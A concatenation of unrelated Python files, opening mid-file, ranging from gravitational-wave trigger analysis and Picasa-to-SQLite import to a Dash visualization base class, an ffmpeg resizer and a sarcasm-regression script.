# j = k.gpsSeconds + float(k.gpsNanoSeconds)/10**9
# l2.append(j)
except IOError:
print("There was no scattering observed for this day.")
print("Done Collected scat segs")
for j in range(len(scatseg)):
scattime.append([scatseg[j][i][1] - scatseg[j][i][0] for i in range(len(scatseg[j]))])
for i in range(len(scattime)):
for k in scattime[i]:
j = k.gpsSeconds + float(k.gpsNanoSeconds)/10**9
l2.append(j)
#print(scatseg)
#print(scattime)
#print(l2)
#print(len(l2))
#print(len(scatseg))
#print((scatseg,l2))
segs = []
for i in range(len(scatseg)):
for j in scatseg[i]:
segs.append(j)
# segs.append(((scatseg[i][j][0].gpsSeconds + float(scatseg[i][j][0].gpsNanoSeconds)/10**9),(scatseg[i][j][1].gpsSeconds+float(scatseg[i][j][1].gpsNanoSeconds)/10**9)))
#print(segs)
#print(len(segs))
#print(segs)
print(len(segs))
df = pd.DataFrame(list(zip(segs,l2)),columns = ["Scatsegs","ScatDur"])
#print(df)
#dfmerged.to_csv("totscatmerged.csv",index = False)
#pt = [1174363865.84,1174382177.97]
#for i in segs:
# for j in pt:
# if j in i:
# print((i,j))
segssor = sorted(segs,key = lambda x : x[0])
seg1 = list(segssor)
print("Done sorting segments.")
merge3 = []
k = 0
for i in seg1:
k +=1
m = 0
for j in seg1[k:]:
if i.intersects(j):
if i[0] == j[0]:
if i[1]<j[1]:
m+=1
i = Segment(i[0],j[1])
elif i[1]>j[1]:
m+=1
i = Segment(i[0],i[1])
elif i[0] != j[0]:
if i[1]<j[1]:
m+=1
i = Segment(i[0],j[1])
elif i[1]>j[1]:
m+=1
i = Segment(i[0],i[1])
elif i[1] == j[1]:
m+=1
i = Segment(i[0],i[1])
seg1.remove(j)
else:
merge3.append(i)
i = Segment(j[0],j[1])
seg1.pop(0)
merge3.append(seg1[0]) # the last segment is not handled by the loop if it does not intersect anything, so append it here
print("Done merging segments")
dfmerge = pd.DataFrame(merge3,columns = ["Segstart","Segend"])
dfmerge["Dur"] = dfmerge["Segend"] - dfmerge["Segstart"]
#dfmerge.to_csv("mergesegs.csv", index = False)
print(len(dfmerge))
starttime1 = int(gpstime)
endtime1 = int(days)*86400 + starttime1
try:
cache = find_trigger_files('L1:GDS-CALIB_STRAIN','omicron', int(starttime1),int(endtime1))
t = EventTable.read(cache, format = 'ligolw', tablename = 'sngl_burst', columns = ['peak_time','peak_time_ns','peak_frequency','snr'])
t1 = t.filter('snr>10','peak_frequency<30.00') # Filtering the table by SNR and Peak frequency.
# adding peaktime and peaktime nanosecond for all the triggers.
pns=[]
[pns.append(float(i)/10**9) for i in t1["peak_time_ns"]]
PeakTime = np.add(t1["peak_time"],pns).tolist()
t1["PeakT"] = PeakTime
t1 = t1[["PeakT","snr","peak_frequency"]]
except (ValueError,ZeroDivisionError) as e:
print("The analysis did not run today.")
print("Done collecting triggers.")
print(len(t1))
#if cache:
# print(t1)
PeakTime1 = []
for i in PeakTime:
PeakTime1.append(i+10)
scattrig = []
trigscat = []
for i in merge3:
for j in PeakTime1:
if j in i:
trigscat.append(j)
scattrig.append(i)
print(len(trigscat))
#df = pd.DataFrame(list(zip(segs,l2)),columns = ["Scatsegs","ScatDur"])
df1 = pd.DataFrame(list(zip(scattrig,trigscat)), columns = ["Scatwithtrigs","TrigsinScat"])
df1.to_csv("trigsinscatmer10.csv", index = False)
#print("The total number of filtered triggers are {0}".format(len(t1)))
#print("The total number of scattring segments are {0}".format(len(segs)))
#print("The total number of triggers within scattering segments are {0}".format(len(trigscat)))
|
#!/usr/bin/env python3
#Suin Kim
#CS265-005
#Assignment 2
import sys
import os
import stat
import re
#checks arguments provided
def checkArg():
if (len(sys.argv) == 1): #if no argument provided, use current directory
return os.getcwd()
elif (len(sys.argv) == 2):
if (os.path.isdir(sys.argv[1])): #if valid directory provided as argument, use that
return os.path.abspath(sys.argv[1])
else:
print(sys.argv[1], "is not a valid directory.")
sys.exit()
else:
print("Too many arguments provided")
sys.exit()
#checks if item is a regular file(or, symlink), directory, a named pipe, or a socket
def checkType(directory, item):
try: #if item exists in directory, checks type
os.path.exists(os.path.join(directory, item))
mode = os.stat(os.path.join(directory, item)).st_mode
if stat.S_ISREG(mode):
return "file"
elif stat.S_ISDIR(mode):
return "dir"
elif stat.S_ISFIFO(mode):
return "fifo"
elif stat.S_ISSOCK(mode):
return "sock"
except: #if item does not exist in directory, assume it is a regular file
return "file"
#generates dir.xml in given directory
def dropXml(directory):
xml = open(os.path.join(directory, "dir.xml"), "w")
xml.write("<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\n<direntry>\n")
if (os.path.isfile(os.path.join(directory, "README"))): #if README file exists in directory
readme(directory, xml) #get index and/or required nodes
other(directory, xml) #get other node and items not listed in README
xml.write("</direntry>\n")
    xml.close()
#parses README file and adds index and/or required nodes to dir.xml
def readme(directory, xml):
readme = open(os.path.join(directory, "README"), "r")
readmeString = readme.read()
readme.close()
readmeItems = list(filter(None, re.split("[:\n]+", readmeString)))
if (readmeItems[0] == "index"): #if README has index entry
xml.write("\t<index>\n\t\t<file>" + readmeItems[1] + "</file>\n\t</index>\n") #index only contains one file
if (len(readmeItems) > 2): #if readmeItems has more than two elements, README has required entry
xml.write("\t<required>\n")
for i in range(3, len(readmeItems)): #items for required entry start at list index 3, checks type for each item
itemType = checkType(directory, readmeItems[i])
xml.write("\t\t<" + itemType + ">" + readmeItems[i] + "</" + itemType + ">\n")
xml.write("\t</required>\n")
else: #if README only has required entry
xml.write("\t<required>\n")
for i in range(1, len(readmeItems)): #items for required entry start at list index 1 since there is no index entry, checks type for each item
itemType = checkType(directory, readmeItems[i])
xml.write("\t\t<" + itemType + ">" + readmeItems[i] + "</" + itemType + ">\n")
xml.write("\t</required>\n")
#adds other node to dir.xml
def other(directory, xml):
xml.write("\t<other>\n")
if (os.path.isfile(os.path.join(directory, "README"))): #if README file exists, check for duplicate items
readme = open(os.path.join(directory, "README"), "r")
readmeString = readme.read()
readme.close()
readmeItems = list(filter(None, re.split("[:\n]+", readmeString)))
otherItems = os.listdir(directory)
items = [i for i in otherItems if i not in readmeItems] #omit items in README for other entry
else:
items = os.listdir(directory) #if no README file exists, no need to check for duplicate items
items.remove("dir.xml") #do not include dir.xml
for item in items: #checks type for each item and adds to other entry
itemType = checkType(directory, item )
xml.write("\t\t<" + itemType + ">" + item + "</" + itemType + ">\n")
xml.write("\t</other>\n")
#main
def main():
rootdir = checkArg() #get root directory
dropXml(rootdir) #generates dir.xml for root directory
for root, dirs, files in os.walk(rootdir): #recursive call with os.walk() to generate dir.xml for subdirectories
dropXml(os.path.abspath(root))
if __name__ == "__main__":
main()
|
#!/usr/bin/env python2
import json
import re
import sqlite3
import os
import pprint
pp = pprint.PrettyPrinter(indent=4)
conn = sqlite3.connect('picasadb.sqlite')
cur = conn.cursor()
# Make some fresh tables using executescript()
cur.executescript('''
DROP TABLE IF EXISTS Albums;
DROP TABLE IF EXISTS Contacts;
DROP TABLE IF EXISTS Starred;
DROP TABLE IF EXISTS Albums_Files;
DROP TABLE IF EXISTS Faces_Files;
DROP TABLE IF EXISTS Faces_EXIF;
DROP VIEW IF EXISTS view_picasa;
DROP VIEW IF EXISTS view_exiftool;
DROP VIEW IF EXISTS faces;
CREATE TABLE Albums (
id TEXT UNIQUE,
name TEXT UNIQUE
);
CREATE TABLE Contacts (
id TEXT,
name TEXT
);
CREATE TABLE Starred (
file TEXT,
folder TEXT
);
CREATE TABLE Albums_Files (
file TEXT,
folder TEXT,
id TEXT
);
CREATE TABLE Faces_Files (
file TEXT,
folder TEXT,
id TEXT
);
CREATE TABLE Faces_EXIF (
file TEXT,
folder TEXT,
name TEXT
);
CREATE VIEW view_picasa AS
SELECT DISTINCT name, folder, file, folder || '/' || file AS path
FROM faces_files
JOIN contacts
ON contacts.id=faces_files.id
ORDER BY name, path
COLLATE nocase;
CREATE VIEW view_exiftool AS
SELECT DISTINCT name, folder, file, folder || '/' || file AS path
FROM faces_exif
ORDER BY name, path
COLLATE nocase;
CREATE VIEW faces AS
SELECT name, folder, file, path
FROM view_exiftool
UNION
SELECT name, folder, file, path
FROM view_picasa;
''')
with open('picasa.ini.json') as data_file:
data = json.load(data_file)
unique_header = list()
unique_album_ids = list()
unique_contacts = list()
albums = list()
starredfiles = list()
file_albums = list()
file_faces = list()
contacts = list()
for row in data:
if re.search('album', row['header'], re.IGNORECASE) and re.search('name', row['action'], re.IGNORECASE):
ID = row['header'].split(':')[1]
name = row['action'].split('=')[1]
if ID not in unique_album_ids:
#print "Album ID & Name:",ID, name
album = dict()
album['id'] = ID
album['name'] = name
unique_album_ids.append(ID)
albums.append(album)
elif re.search('Contacts2', row['header'], re.IGNORECASE):
id = row['action'].split('=')[0]
name = row['action'].split('=')[1].split(';')[0]
#print row['action']
if id not in unique_contacts:
#print "Contact ID & Name:",id, name
contact = dict()
contact['id'] = id
contact['name'] = name
unique_contacts.append(id)
contacts.append(contact)
elif re.search('jpe*g', row['header'], re.IGNORECASE) and re.search('star=yes', row['action'], re.IGNORECASE):
#print "Starred File:", row['folder'], row['header']
starred = dict()
starred['file'] = row['header']
starred['folder'] = row['folder']
starredfiles.append(starred)
elif re.search('jpe*g', row['header'], re.IGNORECASE) and re.search('albums', row['action'], re.IGNORECASE):
ids = row['action'].split('=')[1].split(',')
for id in ids:
#print row['folder'], row['header'], id
file_album = dict()
file_album['file'] = row['header']
file_album['folder'] = row['folder']
file_album['id'] = id
file_albums.append(file_album)
elif re.search('jpe*g', row['header'], re.IGNORECASE) and re.search('faces', row['action'], re.IGNORECASE):
faces = row['action'].split('=')[1].split(';')
#print faces
for face in faces:
#print row['folder'], row['header'], face.split(',')[1]
file_face = dict()
file_face['file'] = row['header']
file_face['folder'] = row['folder']
file_face['id'] = face.split(',')[1]
file_faces.append(file_face)
print "Inserting Albums..."
for i in albums:
#print "album:", i['id'], i['name']
cur.execute('''INSERT INTO Albums (id, name)
VALUES ( ?, ? )''', (i['id'], i['name'] ) )
conn.commit()
print "Inserting Contacts..."
for i in contacts:
#print "contact:", i['id'], i['name']
cur.execute('''INSERT INTO Contacts (id, name)
VALUES ( ?, ? )''', (i['id'], i['name'] ) )
conn.commit()
print "Inserting Starred Files..."
for i in starredfiles:
#print "starred:", i['folder'], i['file']
cur.execute('''INSERT INTO Starred (file, folder)
VALUES ( ?, ? )''',( i['file'], i['folder'] ) )
conn.commit()
print "Inserting Album Content..."
for i in file_albums:
#print "file_album:", i['folder'], i['file'], i['id']
cur.execute('''INSERT INTO Albums_Files (file, folder, id)
VALUES ( ?, ?, ? )''',( i['file'], i['folder'], i['id'] ) )
conn.commit()
print "Inserting Face Content..."
for i in file_faces:
#print "file_face:", i['folder'], i['file'], i['id']
cur.execute('''INSERT INTO Faces_Files (file, folder, id)
VALUES ( ?, ?, ? )''',( i['file'], i['folder'], i['id'] ) )
conn.commit()
with open('exiftool.json') as edata_file:
rawdata = json.load(edata_file)
edata = list()
for row in rawdata:
image = row.get('SourceFile')
region = row.get('RegionName')
if region is not None:
if type(region) is list:
for person in region:
edata.append({'PersonName': person, 'FileName': os.path.basename(image), 'FolderName': os.path.dirname(image)})
else:
edata.append({'PersonName': region, 'FileName': os.path.basename(image), 'FolderName': os.path.dirname(image)})
#pp.pprint(edata)
print "Inserting EXIF Face Content..."
for i in edata:
cur.execute('''INSERT INTO Faces_EXIF (file, folder, name)
VALUES ( ?, ?, ? )''',( i['FileName'], i['FolderName'], i['PersonName'] ) )
conn.commit()
|
# Generated by Django 2.1 on 2018-09-24 06:31
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('mainapp', '0012_auto_20180924_0625'),
]
operations = [
migrations.RemoveField(
model_name='category',
name='image',
),
migrations.RemoveField(
model_name='category',
name='related',
),
]
|
import os, glob
import numpy as np
from ..algorithms.utils import get_file_manager
from ..algorithms.clustered_writes import *
from ..exp_utils import create_empty_dir
def test_get_entity_sizes():
# in C order
bytes_per_voxel = 1
R = (10,9,10)
cs = (5,3,2)
partition = (2,3,5)
bs, brs, bss = get_entity_sizes(cs, bytes_per_voxel, partition)
assert bs == 5*3*2
assert brs == 5*3*2*5
assert bss == 5*3*2*5*3
def test_get_strategy():
# in C order
bytes_per_voxel = 1
R = (20,9,10)
cs = (5,3,2)
partition = (4,3,5)
bs, brs, bss = get_entity_sizes(cs, bytes_per_voxel, partition)
test_case = {
5*2*3: 0, # 1 block
5*2*3*4: 0, # 4 blocks
5*2*3*5: 1, # 1 row
5*2*3*5*2: 1, # 2 rows
5*2*3*5*3: 2, # 1 slice
5*2*3*5*3*3: 2, # 3 slices
5*2*3*5*3*4: 2, # whole img
5*2*3*5*3*7: 2, # whole img (more mem than necessary)
}
for buffer_mem_size, expected in test_case.items():
strategy = get_strategy(buffer_mem_size, bs, brs, bss)
assert strategy == expected
def test_compute_buffers():
# in C order
bytes_per_voxel = 1
R = (20,9,10)
cs = (5,3,2)
partition = (4,3,5)
bs, brs, bss = get_entity_sizes(cs, bytes_per_voxel, partition)
origarr_size = R[0]*R[1]*R[2]*bytes_per_voxel
test_case = {
5*2*3: 4*3*5, # 1 block
5*2*3*4: 4*3*2, # 4 blocks
5*2*3*5: 4*3, # 1 row
5*2*3*5*2: 4*2, # 2 rows
5*2*3*5*3: 4, # 1 slice
5*2*3*5*3*3: 2, # 3 slices
5*2*3*5*3*4: 1, # whole img
5*2*3*5*3*7: 1, # whole img (more mem than necessary)
}
for buffer_mem_size, expected in test_case.items():
strategy = get_strategy(buffer_mem_size, bs, brs, bss)
buffers = compute_buffers(buffer_mem_size, strategy, origarr_size, cs, bs, brs, bss, partition, R, bytes_per_voxel)
# test number of buffers
nb_buffers = len(buffers.values())
assert nb_buffers == expected
def test_clustered_writes():
bpv = 1
R = (20,9,10)
cs = (5,3,2)
ff = 'HDF5'
outdir_path = './outdir'
test_case = [
5*3*2, # 1 block
5*3*2*4, # 4 blocks
5*3*2*5, # 1 row
5*3*2*5*2, # 2 rows
5*3*2*5*3, # 1 slice
5*3*2*5*3*3, # 3 slices
5*3*2*5*3*4, # whole img
5*3*2*5*3*7, # whole img (more mem than necessary)
]
nb_chunks = 4*3*5
# create input array
origarr_filepath = './original_array.hdf5'
data = np.random.normal(size=R)
fm = get_file_manager(ff)
if os.path.isfile(origarr_filepath):
os.remove(origarr_filepath)
fm.write(origarr_filepath, data, R, _slices=None)
for m in test_case:
create_empty_dir(outdir_path)
clustered_writes(origarr_filepath, R, cs, bpv, m, ff, outdir_path)
workdir = os.getcwd()
os.chdir(outdir_path)
filenames = list()
for filename in glob.glob("*.hdf5"):
arr = fm.read_all(filename)
assert arr.shape == cs
filenames.append(filename)
assert len(filenames) == nb_chunks
os.chdir(workdir)
|
#!/usr/bin/python
import sys
if __name__ == "__main__":
#full_msg = sys.stdin.read()
f = open("parseout.txt",'w')
f.write("SUCCESS")
f.close()
|
import os, sys
WORKING_DIR = getattr(sys, '_MEIPASS', os.getcwd())
APPLICATION_DIR = os.path.join(os.path.dirname(os.path.realpath(__file__)), "js_app")
NODE_MODULES = os.path.join(APPLICATION_DIR, "node_modules")
PACKAGE_JSON = os.path.join(APPLICATION_DIR, "package.json")
ELECTRON_DIR = os.path.join(WORKING_DIR, "electron_build")
ELECTRON_ASAR_DEPLOY_PATH = os.path.join(ELECTRON_DIR, "resources", "app.asar")
|
import os
import threading
import time
import dash_bootstrap_components as dbc
from dash import Dash, html
from rubicon_ml import __version__ as rubicon_ml_version
_next_available_port = 8050
class VizBase:
"""The base class for all `rubicon_ml` visualizations.
    `VizBase` cannot be directly instantiated. New widgets must all
extend `VizBase`.
"""
def __init__(
self,
dash_title="base",
):
self.dash_title = f"rubicon-ml: {dash_title}"
@property
def layout(self):
raise NotImplementedError("extensions of `VizBase` must implement property `layout(self)`")
def build_layout(self):
"""Wraps the layout defined by `self.layout` in a container providing
the `rubicon_ml` header.
"""
self.app.layout = dbc.Card(
dbc.CardBody(
[
dbc.Row(
[
html.Img(
id="rubicon-logo-img",
src=self.app.get_asset_url("images/rubicon-logo-dark.png"),
),
],
),
dbc.Row(html.P(rubicon_ml_version, id="version-text"), id="version-row"),
dbc.Row(self.layout),
],
id="frame",
),
)
def load_experiment_data(self):
raise NotImplementedError(
"extensions of `VizBase` must implement `load_experiment_data(self)`"
)
def register_callbacks(self, link_experiment_table=False):
raise NotImplementedError(
"extensions of `VizBase` must implement `register_callbacks(self)`"
)
def serve(self, in_background=False, dash_kwargs={}, run_server_kwargs={}):
"""Serve the Dash app on the next available port to render the visualization.
Parameters
----------
in_background : bool, optional
True to run the Dash app on a thread and return execution to the
interpreter. False to run the Dash app inline and block execution.
Defaults to False.
dash_kwargs : dict, optional
Keyword arguments to be passed along to the newly instantiated
Dash object. Available options can be found at
https://dash.plotly.com/reference#dash.dash.
run_server_kwargs : dict, optional
Keyword arguments to be passed along to `Dash.run_server`.
Available options can be found at
https://dash.plotly.com/reference#app.run_server. Most commonly,
the 'port' argument can be provided here to serve the app on a
specific port.
"""
if self.experiments is None:
raise RuntimeError(
f"`{self.__class__}.experiments` can not be None when `serve` is called"
)
self.app = Dash(
__name__,
external_stylesheets=[dbc.themes.LUX, dbc.icons.BOOTSTRAP],
title=self.dash_title,
**dash_kwargs,
)
self.load_experiment_data()
self.build_layout()
self.register_callbacks()
global _next_available_port
default_run_server_kwargs = {
"dev_tools_silence_routes_logging": True,
"port": _next_available_port,
}
default_run_server_kwargs.update(run_server_kwargs)
_next_available_port = default_run_server_kwargs["port"] + 1
if in_background:
running_server_thread = threading.Thread(
name="run_server",
target=self.app.run_server,
kwargs=default_run_server_kwargs,
)
running_server_thread.daemon = True
running_server_thread.start()
port = default_run_server_kwargs.get("port")
if "proxy" in run_server_kwargs:
host = default_run_server_kwargs.get("proxy").split("::")[-1]
else:
host = f"http://localhost:{port}"
time.sleep(0.1) # wait for thread to see if requested port is available
if not running_server_thread.is_alive():
raise RuntimeError(f"port {port} may already be in use")
return host
else:
self.app.run_server(**default_run_server_kwargs)
def show(self, i_frame_kwargs={}, dash_kwargs={}, run_server_kwargs={}):
"""Show the Dash app inline in a Jupyter notebook.
Parameters
----------
i_frame_kwargs : dict, optional
Keyword arguments to be passed along to the newly instantiated
IFrame object. Available options include 'height' and 'width'.
dash_kwargs : dict, optional
Keyword arguments to be passed along to the newly instantiated
Dash object. Available options can be found at
https://dash.plotly.com/reference#dash.dash.
run_server_kwargs : dict, optional
Keyword arguments to be passed along to `Dash.run_server`.
Available options can be found at
https://dash.plotly.com/reference#app.run_server. Most commonly,
the 'port' argument can be provided here to serve the app on a
specific port.
"""
from IPython.display import IFrame
host = self.serve(
in_background=True, dash_kwargs=dash_kwargs, run_server_kwargs=run_server_kwargs
)
proxied_host = os.path.join(host, self.app.config["requests_pathname_prefix"].lstrip("/"))
default_i_frame_kwargs = {
"height": "600px",
"width": "100%",
}
default_i_frame_kwargs.update(i_frame_kwargs)
return IFrame(proxied_host, **default_i_frame_kwargs)
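# A minimal usage sketch, assuming a hypothetical `ExperimentsTable(VizBase)` subclass
# that sets `self.experiments` (names below are illustrative, not part of this module):
#
#   viz = ExperimentsTable(experiments=my_experiments)
#   host = viz.serve(in_background=True)            # e.g. "http://localhost:8050"
#   viz.show(i_frame_kwargs={"height": "400px"})    # render inline in a notebook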
|
"""
This takes an array of numbers and finds the max product of 3 numbers.
"""
def maxProductFinder(l):
sortL = sorted(l)
product = 0
print(sortL)
product += max(sortL)
print(product)
print(sortL[0] * sortL[1])
print(sortL)
if (sortL[0] * sortL[1]) > sortL[len(sortL)- 2] * sortL[(len(sortL) - 3)]:
product *= sortL[0]*sortL[1]
else:
product *= sortL[len(sortL)- 2]*sortL[(len(sortL) - 3)]
return product
test = [-6, -8, 4, 2, 5, 3, -1, 9, 10]
print(maxProductFinder(test))
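# A more compact equivalent (a sketch of the same idea, without the debug prints):
# the maximum product of three numbers is either the product of the three largest
# values, or the product of the two smallest (possibly negative) values and the largest.
def max_product_of_three(nums):
    s = sorted(nums)
    return max(s[-1] * s[-2] * s[-3], s[0] * s[1] * s[-1])

print(max_product_of_three(test))  # should agree with maxProductFinder(test)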
|
from ffmpy import FFmpeg
import io
from fileModule import FileManager
from subprocess import PIPE, call
call(["chmod", "+x", "ffmpeg"])
def main(args):
inId = args["videoID"]
inconf = ""
outconf = "-f mpegts -vf scale=320:-1"
fm = FileManager()
data = fm.loadFile(inId)
datared = data.read()
ff = FFmpeg(
inputs={"pipe:0": inconf},
outputs={"pipe:1": outconf})
o1, o2 = ff.run(input_data=datared, stdout=PIPE)
bs = io.BytesIO(o1)
outId = fm.saveFile(bs, "res-" + data.filename)
return {"videoID": outId}
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import argparse
import codecs
import sys
import numpy as np
import re
import math
import preproc
from sklearn.preprocessing import LabelEncoder
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction import DictVectorizer
from sklearn.linear_model import Ridge, LinearRegression, LogisticRegression, RidgeCV, Lasso, ElasticNet, BayesianRidge
from sklearn.metrics import classification_report, confusion_matrix, accuracy_score
from sklearn.metrics import mean_absolute_error, mean_squared_error,r2_score
from sklearn.metrics.pairwise import cosine_similarity
from scipy.stats import pearsonr
from sklearn import cross_validation
from sklearn.pipeline import FeatureUnion
from collections import Counter
import pandas as pd
import pylab as plt
from sklearn import decomposition
from sklearn.mixture import GMM
def getFeatures(inputd,cluster=None,noGrep=False,ngram="1-2-3",gmm=None):
features=[]
if cluster:
clusterids=set(cluster.values())
print gmm
    for tweet_idx, tweet in enumerate(inputd):
d={}
tweet="<S> "+tweet+" </S>"
words=tweet.split(" ")
words = [w for w in words if w not in ENGLISH_STOP_WORDS]
# ngram features (G)
for i in range(len(words)) :
# up to N n-grams
for n in ngram.split("-"):
gram = "G "
N=int(n)
for j in range(i,min(i+N, len(words))) :
gram += words[j] + " "
if len(gram.split(" "))==N+2:
d[gram]=1 #binary
# number of ONLY upcased words (U)
d["W upper"] = sum(all(c.isupper() for c in w) for w in words)
# punctuation:
# p1: the number of contiguous sequences of
# exclamation marks, p2: question marks, and
# p3: both exclamation and question marks;
# p4: ? or ! in last token
d["P P!"] = len(re.findall('[!]+',tweet))
d["P P?"] = len(re.findall('[?]+',tweet))
d["P P!?"] = len(re.findall('[!?]*(!+\?+)[!?]*|[!?]*(\?+!+)[!?]*',tweet))
d["P Pl!?"] = len(re.findall('[!?]+',tweet))
### gmm
try:
            values = gmm[tweet_idx]
for idx, v in enumerate(values):
d["gmm{}".format(idx)]=v
except:
donotadd=1
# Brown clusters (B)
# presence or absence of tokens in cluster
if cluster:
active_clusters = [cluster[w] for w in words if w in cluster]
for c in clusterids:
if c in active_clusters:
d["B "+c]=1
# wordsLower = [x.lower() for x in words]
# # skip gram features (S) on lower-cased words
# for i in range(len(wordsLower)) :
# if i+2 < len(wordsLower) :
# gram="S " + wordsLower[i] + " * " + wordsLower[i+2]
# d[gram]=d.get(gram,0)+1
# if i+3 < len(wordsLower) :
# gram="S " + wordsLower[i] + " * " + wordsLower[i+2]+ " " + wordsLower[i+3]
# d[gram]=d.get(gram,0)+1
# gram="S " + wordsLower[i] + " " + wordsLower[i+1]+ " * " + wordsLower[i+3]
# d[gram]=d.get(gram,0)+1
if not noGrep:
# "grep label"
d['label']=findMatching(tweet)
features.append(d)
return features
def findMatching(line):
#### list of regexes ###
pSarc=re.compile("#sarcas",re.IGNORECASE) # to catch #sarcasm #sarcas #sarcastic #sarcastictweet
pIron=re.compile("#iron(y|ic)",re.IGNORECASE)
pNot=re.compile("#not",re.IGNORECASE)
pLiterally=re.compile(r"\bliterally\b",re.IGNORECASE)
pVirtually=re.compile(r"\bvirtually\b",re.IGNORECASE)
pYeahright=re.compile("#yeahright",re.IGNORECASE)
pOhyoumust=re.compile("Oh.*you must",re.IGNORECASE)
pAsXas=re.compile(r"\bas .* as\b",re.IGNORECASE)
pSotospeak=re.compile(r"\bso to speak\b",re.IGNORECASE)
pDontyoulove=re.compile(r"\bdon't you love\b",re.IGNORECASE)
pProverbial=re.compile(r"\bproverbial\b",re.IGNORECASE)
pJustkidding=re.compile("#justkidding",re.IGNORECASE)
pNot2=re.compile(r"\bnot\b",re.IGNORECASE)
pAbout=re.compile(r"\babout\b",re.IGNORECASE)
pOh=re.compile(r"\boh\b",re.IGNORECASE)
DEFAULT="NOLABEL"
if pSarc.search(line):
return "sarcasm"
elif pIron.search(line):
return "iron"
elif pNot.search(line):
return "not"
elif pLiterally.search(line):
return "literally"
elif pVirtually.search(line):
return "virtually"
elif pYeahright.search(line):
return "yeahright"
elif pOhyoumust.search(line):
return "ohyoumust"
elif pAsXas.search(line):
return "asXas"
elif pSotospeak.search(line):
return "sotospeak"
elif pDontyoulove.search(line):
return "dontyoulove"
elif pProverbial.search(line):
return "proverbial"
elif pJustkidding.search(line):
return "justkidding"
elif pNot2.search(line):
return "not2"
elif pAbout.search(line):
return "about"
elif pOh.search(line):
return "oh"
else:
return DEFAULT
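# For example (illustrative): a tweet containing "#sarcasm" is labelled "sarcasm",
# while one containing only "#not" falls through to the "not" label; the patterns
# above are tested in order and the first match wins.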
def main():
parser = argparse.ArgumentParser(description="Ridge regression model")
parser.add_argument('train', help="train data")
parser.add_argument('test', help="test data")
parser.add_argument('--seed', help="random seed",type=int,default=987654321)
parser.add_argument('--debug', help="debug", action='store_true', default=False)
parser.add_argument('--removeHashTags', help="removeHashTags", action='store_true', default=False)
parser.add_argument('--cv', help="run cross-validation", action='store_true', default=False)
parser.add_argument('--cvp', help="output Lcv scores", action='store_true', default=False)
parser.add_argument('--alpha', help="alpha parameter", type=float, default=1)
parser.add_argument('--classweight', help="class weight for +/- classifier", type=float, default=22)
parser.add_argument('--out', help="output gold and predictions", action='store_true', default=False)
parser.add_argument('--compare', help="compare to linReg", action='store_true', default=False)
parser.add_argument('--pred', help="output predictions", action='store_true', default=False)
parser.add_argument('--plot', help="plot predictions", action='store_true', default=False)
parser.add_argument('--noGrep', help="no label feats", action='store_true', default=False)
parser.add_argument('--cluster', help="brown clusters", type=str)
parser.add_argument('--ngram', help="n-grams", type=str,default="1-2-3")
parser.add_argument('-c','--components', help="num PCA components", type=int, default=100)
parser.add_argument('-g','--gmmcomponents', help="num GMM components", type=int, default=12)
parser.add_argument('--gmm', help="add gmm features", action='store_true', default=False)
args = parser.parse_args()
####### load data
tweetids,inputd,labels=read_data_file(args.train,args.removeHashTags)
tweetids=np.array(tweetids)
print >>sys.stderr, "{} instances loaded.".format(len(inputd))
print >>sys.stderr, u"Instance: {} {}".format(labels[-2],inputd[-2])
np.random.seed(args.seed)
data ={}
print >>sys.stderr, len(labels)
# target labels
data['target'] = np.array(labels)
vectorizer=DictVectorizer()
vectorizernogmm=DictVectorizer()
cluster=None
if args.cluster:
word2clusters = {}
for l in map(str.strip,open(args.cluster).readlines()) :
bitstring,word,count = l.split("\t")
word2clusters[word] = bitstring
cluster=word2clusters
gmm_predicted=[]
if args.gmm:
## get features for gmm
X_train_dict = getFeatures(inputd,cluster=cluster,noGrep=args.noGrep,ngram=args.ngram)
X_train = vectorizernogmm.fit_transform(X_train_dict)
pca = decomposition.RandomizedPCA(n_components=args.components)
X_train_pca = pca.fit_transform(X_train)
print X_train_pca
gmm = GMM(n_components = args.gmmcomponents,
covariance_type = "full",
min_covar = 0.01)
gmm.fit(X_train_pca)
PASTE=1
gmm_predicted=gmm.predict_proba(X_train_pca)
print gmm_predicted
X_train_dict = getFeatures(inputd,cluster=cluster,noGrep=args.noGrep,ngram=args.ngram,gmm=gmm_predicted)
print >>sys.stderr, u"Features: {}".format(X_train_dict[-2])
data['data'] = vectorizer.fit_transform(X_train_dict)
#print vectorizer.vocabulary_
if args.cv:
num_inst=len(labels)
train_cv={}
cross=cross_validation.KFold(len(labels),n_folds=10)
acc=[]
for train_index, test_index in cross:
if args.debug:
print("TRAIN:", len(train_index), "TEST:", len(test_index))
X=data['data']
y=data['target']
X_train, X_test = X[train_index], X[test_index]
y_train, y_test = y[train_index], y[test_index]
model= Ridge(alpha=args.alpha)
model.fit(X_train,y_train)
y_pred= model.predict(X_test)
assert(len(y_pred)==len(test_index))
tids=tweetids[test_index]
for twid,pred in zip(tids,y_pred):
train_cv[twid] = pred
y_pred_official=[math.floor(x + 0.5) for x in y_pred]
y_gold_official=[math.floor(x + 0.5) for x in y_test]
acc.append(cosine_similarity(y_gold_official,y_pred_official)[0][0])
if args.debug:
evaluate(y_test,y_pred,plot=args.plot)
print >>sys.stderr, "Cosine of 10-folds:", acc
print >>sys.stderr, "Macro average:", np.mean(np.array(acc)), np.std(np.array(acc))
if args.cvp:
for twid in tweetids:
print "{}\t{}".format(twid,train_cv[twid])
### test data
tweetids,testd,y_test=read_data_file(args.test,args.removeHashTags)
if args.gmm:
## get features for gmm on test data
X_test_dict = getFeatures(testd,cluster=cluster,noGrep=args.noGrep,ngram=args.ngram) #without gmm
X_test=vectorizernogmm.transform(X_test_dict)
X_test_pca = pca.transform(X_test)
gmm_predicted=gmm.predict_proba(X_test_pca)
print gmm_predicted
X_test_dict = getFeatures(testd,cluster=cluster,noGrep=args.noGrep,ngram=args.ngram,gmm=gmm_predicted)
X_test=vectorizer.transform(X_test_dict)
print >>sys.stderr, "Train on whole, eval on trial"
if args.compare:
print "LinearReg"
model=LinearRegression()
model.fit(data['data'],data['target'])
y_pred= model.predict(X_test)
evaluate(y_test,y_pred)
print >>sys.stderr, "Ridge"
#model=RidgeCV([0.00000001,0.001,0.01,0.0001,0.1,1.0,1.5,2,10]) #alpha=args.alpha)
model=Ridge(alpha=args.alpha)
#model=Lasso(alpha=args.alpha)
#model=ElasticNet(alpha=args.alpha, l1_ratio=0.7)
model.fit(data['data'],data['target'])
y_pred= model.predict(X_test)
y_pred=y_pred
